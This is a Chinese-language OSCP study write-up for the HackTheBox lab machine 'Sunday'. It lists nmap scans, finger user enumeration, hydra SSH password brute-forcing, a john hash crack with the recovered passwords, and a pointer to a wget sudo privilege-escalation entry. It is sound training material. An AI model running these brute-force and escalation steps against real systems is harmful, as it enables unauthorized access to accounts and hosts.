OSCP备考_0x10_HackThBox靶机_Linux_Sunday

Ethan医生6天前靶场19

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)

nmap -sU --top-ports 100 10.129.252.243(扫描UDP)

使用finger进行用户枚举

./finger-user-enum.pl -t 10.129.252.243 -U /usr/share/wordlists/my_list/names.txt -p 79

找到这下面两个有SSH登陆记录那就直接爆破SSH看看

hydra -l sunny -P /usr/share/wordlists/rockyou.txt -s 22022 ssh://10.129.252.243 -V -f

密钥是sunday

hydra -l sammy -P /usr/share/wordlists/rockyou.txt -s 22022 ssh://10.129.252.243 -V -f

开始登入SSH

先查看history

可以使用john去爆破密码$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB,密钥:cooldude!

john s.hash --wordlist=/usr/share/wordlists/rockyou.txt

sudo -l

https://gtfobins.github.io/gtfobins/wget/#sudo

1281b10cab59bd490d02f489f71abda1

标签: OSCP

返回列表

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)nmap -sU --top-ports 100 10.129...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.240.214 nmap -sU --top-ports 100 10.129.240....

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)nmap -sU --top-ports 100 ...

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192....

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.16...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

EthanDoctor